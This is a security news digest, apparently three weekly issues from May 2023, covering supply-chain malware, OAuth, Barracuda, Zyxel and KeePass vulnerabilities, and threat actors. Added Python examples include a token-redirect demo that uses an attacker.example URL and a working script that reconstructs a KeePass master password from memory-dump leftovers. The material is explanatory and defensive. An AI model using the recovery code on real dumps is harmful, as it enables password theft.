how human behavior affects security

Programmer’s Digest #34

05/25/2023-05/31/2023 PyPI Implements Mandatory Two-Factor Authentication, Critical OAuth Vulnerability, Zyxel Issues Critical Security Patches And More

1. PyPI Implements Mandatory Two-Factor Authentication for Project Owners

The Python Package Index (PyPI) announced that every account that maintains a project on the official third-party Python package repository will be required to turn on two-factor authentication (2FA) by the end of the year. The requirement also covers organization maintainers, but not every user of the service. The goal is to blunt account takeover attacks, which an attacker can use to push trojanized versions of popular packages and so poison the software supply chain and deploy malware at scale. PyPI, like other open source registries such as npm, has repeatedly had to deal with malware uploads and package impersonation.

2. Critical OAuth Vulnerability in Expo Framework Allows Account Hijacking

A critical security vulnerability in the OAuth implementation of Expo.io has been disclosed. The flaw, tracked as CVE-2023-28131, carries a CVSS score of 9.6. Salt Labs, an API security firm, reported that it exposed services using Expo.io to credential leakage, allowing attackers to hijack accounts and access sensitive data. Exploitation could let threat actors perform unauthorized actions on behalf of compromised users on platforms such as Facebook, Google, and Twitter. A successful attack required the Expo.io site or app to have configured the AuthSession Proxy setting for single sign-on (SSO) through a third-party provider, and the victim to click a malicious link delivered by email, SMS, or a dubious website. Expo.io released a hotfix shortly after responsible disclosure and advised users to migrate from AuthSession API proxies to registering deep link URL schemes directly with the authentication provider. Expo.io attributed the flaw to the proxy storing an app’s callback URL before the user had confirmed the sign-in, which is what let a crafted link send the returned credentials to a URL the attacker chose.
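To make the root cause concrete, here is an added Python sketch (illustrative code, not Expo's implementation) of the two behaviours: a proxy that records the return URL from the start request before anything has been confirmed, and a hardened one that accepts only a return URL registered in advance for that app, matched exactly, and releases the token only after the user confirms. The app slug, the registry entries and every URL below are constructed for the demonstration.

```python
"""Added example: strict return-URL handling for an OAuth sign-in proxy.
Illustrative code, not Expo's implementation; app slugs, URLs and the
registry below are constructed for the demonstration."""
from urllib.parse import urlsplit

# Return URLs each app declared when it registered (constructed data).
REGISTERED_RETURN_URLS = {
    "acme-app": {"acmeapp://auth", "https://acme.example/auth/callback"},
}


def normalize(url):
    """Canonical form for comparison: lower-case scheme and host, drop any
    fragment, leave path and query exactly as supplied."""
    parts = urlsplit(url)
    return parts._replace(scheme=parts.scheme.lower(),
                          netloc=parts.netloc.lower(),
                          fragment="").geturl()


def is_allowed_return_url(app_slug, candidate, registry=REGISTERED_RETURN_URLS):
    """Exact match against the app's registered list. Deliberately no prefix,
    substring or host-suffix matching: those are the classic redirect bypasses."""
    allowed = {normalize(u) for u in registry.get(app_slug, ())}
    return normalize(candidate) in allowed


class ProxyVulnerable:
    """Mirrors the root cause described above: the return URL carried by the
    start request is stored unconditionally, before the user has confirmed
    anything, so whoever crafted the link decides where the token goes."""

    def __init__(self):
        self.pending = {}

    def start(self, state, app_slug, return_url):
        self.pending[state] = return_url  # attacker-controlled, never checked
        return f"https://idp.example/authorize?state={state}"

    def finish(self, state, provider_token):
        return f"{self.pending.pop(state)}#access_token={provider_token}"


class ProxyHardened:
    """Rejects unregistered return URLs up front and releases the token only
    after the user has confirmed the hand-off to the app."""

    def __init__(self):
        self.pending = {}

    def start(self, state, app_slug, return_url):
        if not is_allowed_return_url(app_slug, return_url):
            raise ValueError(f"return URL not registered for {app_slug!r}")
        self.pending[state] = return_url
        return f"https://idp.example/authorize?state={state}"

    def finish(self, state, provider_token, user_confirmed):
        return_url = self.pending.pop(state)
        if not user_confirmed:
            raise PermissionError("user did not confirm the sign-in")
        return f"{return_url}#access_token={provider_token}"


if __name__ == "__main__":
    evil = "https://attacker.example/collect"
    bad = ProxyVulnerable()
    bad.start("s1", "acme-app", evil)
    print("vulnerable proxy sends token to:", bad.finish("s1", "tok123"))
    good = ProxyHardened()
    try:
        good.start("s2", "acme-app", evil)
    except ValueError as exc:
        print("hardened proxy:", exc)
```

The exact-match check is the part worth copying: case-normalising scheme and host is safe, but anything looser (prefix matching, allowing extra path segments, matching on host suffix) reopens the same class of token redirection.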

3. Severe Flaw in Google Cloud’s Cloud SQL Service Exposed Confidential Data

A security flaw has been disclosed in Google Cloud Platform’s Cloud SQL service that could allow unauthorized access to sensitive data. According to Israeli cloud security firm Dig, the vulnerability let an attacker escalate from a basic Cloud SQL user to a sysadmin, gaining access to internal GCP data, customer data, secrets, sensitive files, and passwords. Cloud SQL is a managed service for running MySQL, PostgreSQL, and SQL Server databases for cloud-based applications. The attack chain identified by Dig abused a gap in the permissions of the managed SQL Server instance to elevate to an administrator role.
With those permissions, the attacker could exploit a second misconfiguration to obtain system administrator rights and take full control of the database server, which meant access to every file on the underlying operating system, the ability to extract passwords, and a foothold for further attacks.
The exposure of internal data, including secrets, URLs, and passwords, would be a significant security incident for cloud providers and their customers alike, according to Dig researchers Ofir Balassiano and Ofir Shaty.

4. Alert: Hackers Exploit Barracuda Email Security Gateway 0-Day Flaw for 7 Months

Barracuda, an enterprise security firm, revealed that threat actors have been exploiting a recently patched zero-day vulnerability in its Email Security Gateway (ESG) appliances since October 2022. The critical flaw, tracked as CVE-2023-2868, allows remote attackers to execute code on vulnerable installations and affects versions 5.1.3.001 through 9.2.0.006. Barracuda released patches on May 20 and May 21 to address it.
The attacks, active for at least seven months before discovery, involved three malware strains: SALTWATER, SEASPY, and SEASIDE. SALTWATER is a trojanized module that can upload and download files, execute commands, and proxy malicious traffic. SEASPY is an x64 ELF backdoor with persistence capabilities that stays dormant until it receives a magic packet. SEASIDE is a Lua-based module that establishes reverse shells driven by commands smuggled in SMTP traffic.
Mandiant, owned by Google, noted code overlaps between SEASPY and cd00r, a publicly available passive backdoor that likewise waits for a trigger packet. The attacks have not been attributed to any known threat actor or group. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, requiring federal agencies to apply the fixes by June 16, 2023.

5. Zyxel Issues Critical Security Patches for Firewall and VPN Products

Zyxel has released software updates to address two critical buffer overflow vulnerabilities, identified as CVE-2023-33009 and CVE-2023-33010, affecting certain firewall and VPN products. The flaws, rated 9.8 out of 10 on the CVSS scoring system, could allow remote attackers to execute code and cause denial-of-service (DoS) conditions. The impacted devices include ATP, USG FLEX, USG FLEX50(W) / USG20(W)-VPN, VPN, and ZyWALL/USG models.
Security researchers from TRAPA Security and STAR Labs SG discovered and reported the vulnerabilities. This advisory follows Zyxel’s recent fixes for another critical flaw, CVE-2023-28771, which allowed remote code execution on firewall devices. That vulnerability was also credited to TRAPA Security and was exploited by threat actors associated with the Mirai botnet.
It is crucial for Zyxel users to apply the provided software updates promptly to mitigate the risks associated with these security vulnerabilities.

6. GUAC 0.1 Beta: Google’s Breakthrough Framework for Secure Software Supply Chains

Google has released the 0.1 beta of GUAC (Graph for Understanding Artifact Composition), an open-source framework meant to help organizations improve the security of their software supply chains. GUAC is offered as an API, so developers can plug in their own tools and policy engines.

It aggregates software security metadata from many sources into a graph database, so the relationships between software components can be queried. By ingesting Software Bill of Materials (SBOM) documents, SLSA attestations, OSV vulnerability feeds, and other data, GUAC helps assess risk profiles and visualize how artifacts relate to one another. The aim is to respond to supply chain attacks effectively, generate patch plans, and react promptly to security incidents. Google’s example scenario: record (certify) that a particular builder has been compromised, then query the graph for every artifact that builder produced.
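As an added illustration of that scenario (not GUAC's own code, schema or query language), the Python below builds a tiny in-memory graph from the two kinds of edges GUAC ingests that matter here, SLSA "built by" provenance and SBOM "depends on" relationships, marks one builder as compromised, walks the graph to list every downstream artifact, and then orders those artifacts so that each is rebuilt only after its affected dependencies. Package identifiers and builder names are made up.

```python
"""Added example: 'which artifacts did a compromised builder touch, and in what
order do we rebuild them'. Illustrative code, not GUAC's; all package and
builder identifiers below are constructed."""
from collections import deque

# SLSA-style provenance: artifact -> builder that produced it (constructed).
BUILT_BY = {
    "pkg:pypi/libfoo@1.2.0": "builder:ci-runner-A",
    "pkg:pypi/libbar@0.9.1": "builder:ci-runner-B",
    "pkg:pypi/app-core@3.0.0": "builder:ci-runner-A",
}

# SBOM-style dependencies: artifact -> its direct dependencies (constructed).
DEPENDS_ON = {
    "pkg:pypi/service-api@7.1.0": {"pkg:pypi/libfoo@1.2.0", "pkg:pypi/libbar@0.9.1"},
    "pkg:pypi/service-web@7.1.0": {"pkg:pypi/service-api@7.1.0"},
    "pkg:pypi/batch-job@2.2.0": {"pkg:pypi/libbar@0.9.1"},
}


def build_graph(built_by, depends_on):
    """Forward adjacency: node -> nodes that are directly tainted if node is bad.
    A bad builder taints what it built; a bad artifact taints its dependents."""
    affected_by = {}
    for artifact, builder in built_by.items():
        affected_by.setdefault(builder, set()).add(artifact)
    for artifact, deps in depends_on.items():
        for dep in deps:
            affected_by.setdefault(dep, set()).add(artifact)
    return affected_by


def affected_artifacts(graph, compromised_node):
    """Breadth-first walk from the compromised node over the forward edges;
    returns every artifact reachable from it (transitively affected)."""
    seen, queue = set(), deque([compromised_node])
    while queue:
        node = queue.popleft()
        for nxt in graph.get(node, ()):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(nxt)
    return seen


def rebuild_order(affected, depends_on):
    """Patch plan: topological order restricted to the affected set, so an
    artifact is rebuilt only after every affected dependency of it has been."""
    remaining = {a: {d for d in depends_on.get(a, ()) if d in affected} for a in affected}
    order = []
    while remaining:
        ready = sorted(a for a, deps in remaining.items() if not deps)
        if not ready:
            raise ValueError("dependency cycle among affected artifacts")
        for a in ready:
            order.append(a)
            del remaining[a]
        for deps in remaining.values():
            deps.difference_update(ready)
    return order


if __name__ == "__main__":
    graph = build_graph(BUILT_BY, DEPENDS_ON)
    bad_builder = "builder:ci-runner-A"
    hit = affected_artifacts(graph, bad_builder)
    print(f"{bad_builder} compromised; affected: {sorted(hit)}")
    print("rebuild order:", rebuild_order(hit, DEPENDS_ON))
```

The same two queries (reachability, then a dependency-respecting order) are what turn a pile of SBOMs and attestations into an incident response list, which is the point of putting the metadata in a graph in the first place.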

2023   digest   programmers'

Programmer’s Digest #33

05/18/2023-05/24/2023 PyPI Repository Under Attack, NPM Packages for Node.js Hiding Dangerous TurkoRat Malware, Malicious Windows Kernel Drivers And More

1. PyPI Repository Under Attack: User Sign-Ups and Package Uploads Temporarily Halted

The maintainers of the Python Package Index (PyPI) temporarily disabled new user sign-ups and new package uploads until further notice, citing a volume of malicious users and malicious projects that had outpaced their ability to respond. No further details about the nature of the malware or the threat actors publishing the rogue packages were disclosed. The freeze comes as software registries such as PyPI have proven time and again to be a popular target for attackers looking to poison the software supply chain and compromise developer environments. Earlier this week, cybersecurity startup Phylum uncovered an active malware campaign that uses OpenAI ChatGPT-themed lures to bait developers into downloading a malicious Python module that steals clipboard content in order to hijack cryptocurrency transactions. In a similar discovery, ReversingLabs identified npm packages named nodejs-encrypt-agent and nodejs-cookie-proxy-agent that drop a trojan called TurkoRAT.

2. npm Packages Caught Serving TurkoRAT Binaries That Mimic NodeJS

Software security firm ReversingLabs analyzed three npm packages, named after legitimate Node.js libraries, that had sat on the npmjs.com registry for more than two months. Each shipped a Windows executable that looked like Node.js itself but dropped a trojan. Their stealth and very low detection rate explain how they went unnoticed for so long.

Initially appearing legitimate, the package named nodejs-encrypt-agent drew attention because of inconsistencies between its name and its metadata. Further investigation by ReversingLabs revealed that it contained a malicious portable executable (PE) file named ‘lib.exe.’ At roughly 100 MB, the file closely resembled a real Node.js binary, which helped it avoid scrutiny. The PE file runs a customizable infostealer called TurkoRAT, designed to steal sensitive information such as login credentials and crypto wallets while evading sandbox environments and debuggers. Another package, nodejs-cookie-proxy-agent, disguised the malicious executable as a dependency named axios-proxy. ReversingLabs detected and reported the packages, underscoring the ongoing risk that unvetted open source packages pose to software supply chain security.

3. Privacy Sandbox Initiative: Google to Phase Out Third-Party Cookies Starting 2024

Google has announced plans to officially flip the switch on its twice-delayed Privacy Sandbox initiatives as it slowly works its way to deprecate support for third-party cookies in Chrome browser. To that end, the search and advertising giant said it intends to phase out third-party cookies for 1% of Chrome users globally in the first quarter of 2024. This will support developers in conducting real world experiments that assess the readiness and effectiveness of their products without third-party cookies. Prior to rolling this out, Google said it would introduce the ability for third-party developers to simulate the process for a configurable subset of their users (up to 10%) in Q4 2023. Privacy Sandbox is a two-pronged project for the web and Android that aims to limit covert tracking by eliminating the need for third-party cookies and cross-app identifiers and still serving relevant content and ads in a privacy-preserving manner.

4. Malicious Windows Kernel Drivers Used In BlackCat Ransomware Attacks

BlackCat (ALPHV) operators used signed malicious Windows kernel drivers to evade detection by security software during attacks. The driver, an improved version of the ‘POORTRY’ malware, was spotted by Trend Micro and had previously been identified by Microsoft, Mandiant, Sophos, and SentinelOne in ransomware attacks. POORTRY was originally signed with keys stolen from legitimate accounts in Microsoft’s Windows Hardware Developer Program. Security software is normally protected from termination or tampering, but kernel drivers run at the highest privilege level and can terminate nearly any process. The ransomware actors first used the Microsoft-signed POORTRY driver; its high detection rate and the revocation of the code-signing keys pushed them to deploy an updated version. That updated driver, signed with a stolen or leaked cross-signing certificate, helps the BlackCat operation elevate privileges on compromised machines and terminate security-related processes.

5. KeePass Exploit Allows Attackers to Recover Master Passwords from Memory

A proof-of-concept (PoC) has been published for a flaw in the KeePass password manager that can be used to recover a victim’s master password in cleartext under specific circumstances. The issue, tracked as CVE-2023-32784, affects KeePass 2.x on Windows, Linux, and macOS and is expected to be fixed in version 2.54, likely to be released early next month. The root cause is the custom text box (SecureTextBoxEx) used to enter the master password: for each character typed it leaves behind a managed string in process memory consisting of the masking bullet repeated once per character already entered, followed by the newly typed character. An attacker who obtains a memory dump of the process (or a pagefile or hibernation file that process memory was written to) can collect those leftovers and reassemble the password in plaintext, except for the first character, for which no such leftover exists. Users are advised to update to KeePass 2.54 once it becomes available.
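The following Python, added here and not part of the public PoC or of KeePass, shows what that leftover pattern looks like and how it is carved back out of a memory image. The "dump" is constructed in the script itself from a throwaway password so the example runs offline; against a dump of your own test instance the same scan applies, and the first character comes back as "?" because nothing in memory records it.

```python
"""Added example: carving CVE-2023-32784-style leftovers out of a memory image.
Illustrative code written for this digest; the 'dump' below is constructed
and is not a real KeePass process image."""
import re
from collections import defaultdict

BULLET = "\u2022"  # the masking character the password box draws per typed char


def constructed_dump(password):
    """Fake process memory: for every keystroke after the first, a UTF-16LE
    string of (n-1) bullets followed by the typed character, surrounded by
    unrelated bytes. Constructed test data."""
    noise = b"\x00" * 16 + "hello, world".encode("utf-16-le") + b"\xff" * 8
    blob = bytearray(noise)
    for n in range(2, len(password) + 1):
        leftover = BULLET * (n - 1) + password[n - 1]
        blob += leftover.encode("utf-16-le") + b"\x00\x00" + noise
    return bytes(blob)


# A run of UTF-16LE bullets (bytes 0x22 0x20) followed by one more code unit.
LEFTOVER_RE = re.compile(rb"((?:\x22\x20)+)(..)", re.DOTALL)


def recover_candidates(dump):
    """Map password position -> set of characters seen at that position.
    A leftover with k bullets describes position k+1 (1-based)."""
    by_pos = defaultdict(set)
    for m in LEFTOVER_RE.finditer(dump):
        k = len(m.group(1)) // 2
        try:
            ch = m.group(2).decode("utf-16-le")
        except UnicodeDecodeError:
            continue
        if ch != BULLET and ch.isprintable():
            by_pos[k + 1].add(ch)
    return dict(by_pos)


def reassemble(by_pos):
    """Position 1 is never recoverable (no leftover has zero bullets), so it is
    emitted as '?'. Positions with several candidates are shown as {candidates}."""
    if not by_pos:
        return ""
    out = ["?"]
    for pos in range(2, max(by_pos) + 1):
        cands = sorted(by_pos.get(pos, ()))
        if len(cands) == 1:
            out.append(cands[0])
        elif cands:
            out.append("{" + "".join(cands) + "}")
        else:
            out.append("?")
    return "".join(out)


if __name__ == "__main__":
    dump = constructed_dump("Password")
    print(reassemble(recover_candidates(dump)))  # ?assword
```

On a real image the scan also picks up leftovers from earlier, mistyped or previous passwords, which is why the result is presented as a set of candidates per position rather than a single string.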

6. Threat Group UNC3944 Abusing Azure Serial Console for Total VM Takeover

UNC3944, a financially motivated actor also known as Roasted 0ktapus, has been abusing the Microsoft Azure Serial Console on virtual machines (VMs) to install third-party remote management tools. Because the serial console delivers commands through the Azure management plane rather than through the VM’s network interfaces, the activity sidesteps many traditional detections and gives the attacker full administrative access to the compromised VM. UNC3944, which emerged last year, uses SIM swapping to breach telecommunications and business process outsourcing companies. Mandiant, owned by Google, previously observed UNC3944 using a loader named STONESTOP to install a malicious signed driver called POORTRY, which terminates security processes and deletes files as part of a bring-your-own-vulnerable-driver (BYOVD) attack. Initial access most likely begins with SMS phishing aimed at privileged users to obtain their credentials, followed by a SIM swap to defeat SMS-based authentication. With that access, UNC3944 leverages Azure VM extensions and the serial console to gain administrative control, then uses PowerShell to deploy legitimate remote administration tools, a living-off-the-land approach that keeps the intrusion below the radar while the attack advances.


Programmer’s Digest #32

05/11/2023-05/17/2023 11 New Vulnerabilities Expose OT Networks, New Flaw in WordPress Plugin, New Stealthy Variant of Linux Backdoor And More

1. Industrial Cellular Routers at Risk: 11 New Vulnerabilities Expose OT Networks

Several security vulnerabilities in cloud management platforms linked to three industrial cellular router vendors were revealed by Israeli cybersecurity firm OTORIO at the Black Hat Asia 2023 conference. These vulnerabilities could expose operational technology (OT) networks to external attacks, impacting critical infrastructure sectors like substations, water utilities, oil fields, and pipelines. The weaknesses affect the cloud-based management solutions offered by Sierra Wireless, Teltonika Networks, and InHand Networks. Exploiting the vulnerabilities could enable remote code execution, full control over devices and OT networks, exfiltration of sensitive information, and unauthorized access with elevated permissions. The flaws involve weak asset registration mechanisms, security configuration flaws, and issues in external APIs and interfaces. Collaboration with Claroty also led to the discovery of additional vulnerabilities in Teltonika Networks’ RMS and RUT router firmware, allowing arbitrary code execution and command injection.

2. New ‘MichaelKors’ Ransomware-as-a-Service Targeting Linux and VMware ESXi Systems

MichaelKors, a new ransomware-as-a-service (RaaS) operation, has emerged, targeting Linux and VMware ESXi systems as of April 2023. Cybersecurity firm CrowdStrike has observed cybercriminals focusing more and more on ESXi, a hypervisor that is widely deployed yet cannot run third-party agents or antivirus software, which leaves it without endpoint detection and makes it an appealing target; CrowdStrike calls this hypervisor jackpotting. Babuk source code leaked in September 2021 has been used by 10 different ransomware families, including Conti and REvil, to build lockers for VMware ESXi hypervisors, and e-crime groups such as ALPHV (BlackCat), Black Basta, and Defray have also adapted their tooling to target ESXi. Attackers use compromised credentials, gain elevated privileges, and leverage known vulnerabilities to breach ESXi hypervisors and gain unrestricted access to the underlying resources. To limit the impact of hypervisor jackpotting, organizations are advised to avoid direct access to ESXi hosts, enable two-factor authentication, take periodic backups of ESXi datastore volumes, apply security updates, and conduct security posture reviews.

3. XWorm Malware Exploits Follina Vulnerability in New Wave of Attacks

Researchers have uncovered an ongoing phishing campaign, named MEME#4CHAN, that utilizes a unique attack chain to distribute the XWorm malware. The attacks have primarily targeted manufacturing firms and healthcare clinics in Germany. The campaign employs meme-filled PowerShell code and heavily obfuscated XWorm payloads to infect victims. The attackers use reservation-themed lures in phishing emails, tricking recipients into opening malicious documents. Rather than relying on macros, the threat actors exploit the Follina vulnerability to drop an obfuscated PowerShell script. This script bypasses Antimalware Scan Interface (AMSI), disables Microsoft Defender, establishes persistence, and executes the .NET binary containing XWorm. The PowerShell script includes a variable named “$CHOTAbheem,” possibly indicating a Middle Eastern or Indian background of the attackers, although attribution remains unconfirmed. XWorm is a readily available malware with various features for stealing sensitive information from infected systems.

4. New Stealthy Variant of Linux Backdoor BPFDoor Emerges from the Shadows

A new variant of a Linux backdoor called BPFDoor has been discovered by cybersecurity firm Deep Instinct. BPFDoor, previously documented by PwC and Elastic Security Labs in May 2022, is associated with a Chinese threat actor tracked as Red Menshen. The malware is built for persistent remote access to compromised environments and has mainly been aimed at telecom providers in the Middle East and Asia. BPFDoor attaches a Berkeley Packet Filter (BPF) to a raw socket so it can watch for a specially crafted trigger packet: the filter passes only packets carrying the expected magic values and discards everything else, and because a raw socket sees traffic before the host firewall filters it, the backdoor can be triggered on ports that appear closed. The latest variant is more evasive: it removes hard-coded indicators, adds encryption via libtomcrypt, and uses a reverse shell for command-and-control. It ignores operating system signals to avoid termination and establishes an encrypted reverse shell session with the C2 server. BPFDoor’s ability to stay undetected for so long reflects its sophistication, as threat actors increasingly target the Linux systems that dominate enterprise and cloud environments.

5. New Flaw in WordPress Plugin Used by Over a Million Sites Under Active Exploitation

A security vulnerability has been discovered in the Essential Addons for Elementor WordPress plugin, potentially allowing attackers to gain elevated privileges. The flaw, tracked as CVE-2023-32243, was addressed in version 5.7.2 of the plugin. Successful exploitation of the vulnerability could enable an unauthenticated user to reset the password of any user on the affected site. This could result in the compromise of administrator accounts and complete control over the website. The issue has existed since version 5.4.0 of the plugin. The disclosure follows a previous severe flaw found in the same plugin, and it coincides with a wave of attacks targeting WordPress sites with SocGholish malware. The attackers are using compression techniques to conceal the malware and evade detection. Additionally, a malvertising campaign has been identified that tricks visitors to adult websites with fake Windows update ads, leading to the installation of the “Invalid Printer” loader, which can deploy the Aurora information stealer malware.

6. Babuk Source Code Sparks 9 Different Ransomware Strains Targeting VMware ESXi Systems

The leak of the Babuk ransomware source code in September 2021 has spawned multiple ransomware families targeting VMware ESXi systems. According to SentinelOne, as many as nine distinct variants built on the leaked code emerged between late 2022 and early 2023, putting an effective Linux locker in the hands of cybercriminals with little expertise of their own. Strains based on the Babuk code include Cylance (the ransomware, unrelated to the security vendor of the same name), Rorschach (also known as BabLock), and RTM Locker. SentinelOne’s analysis also found overlaps between Babuk and families such as Conti and REvil (whose ESXi locker is known as REvix), indicating that Babuk features were adopted into their code, and further families, including LOCK4, DATAF, Mario, Play, and Babuk 2023 (also known as XVGV), borrow various elements from it. No significant similarities were found between Babuk and ALPHV, Black Basta, Hive, LockBit, or ESXiArgs, contrary to earlier claims linking them. SentinelOne also expects actors to turn to Babuk’s Go-based NAS locker as Go continues to gain popularity among threat actors. Separately, the threat actors behind the Royal ransomware, believed to be former Conti members, have introduced an ELF variant capable of targeting Linux and ESXi environments.

7. Hackers Use Azure Serial Console For Stealthy Access To VMs

A financially motivated cybergang tracked by Mandiant as ‘UNC3944’ is using phishing and SIM swapping attacks to hijack Microsoft Azure admin accounts and gain access to virtual machines.
From there, the attackers abuse the Azure Serial Console to install remote management software for persistence and abuse Azure Extensions for stealthy surveillance.
Mandiant reports that UNC3944 has been active since at least May 2022, and their campaign aims at stealing data from victim organizations using Microsoft’s cloud computing service.
Mandiant had previously attributed the STONESTOP loader and the POORTRY kernel-mode driver, a toolkit for terminating security software, to UNC3944.
The threat actors utilized stolen Microsoft hardware developer accounts to sign their kernel drivers.
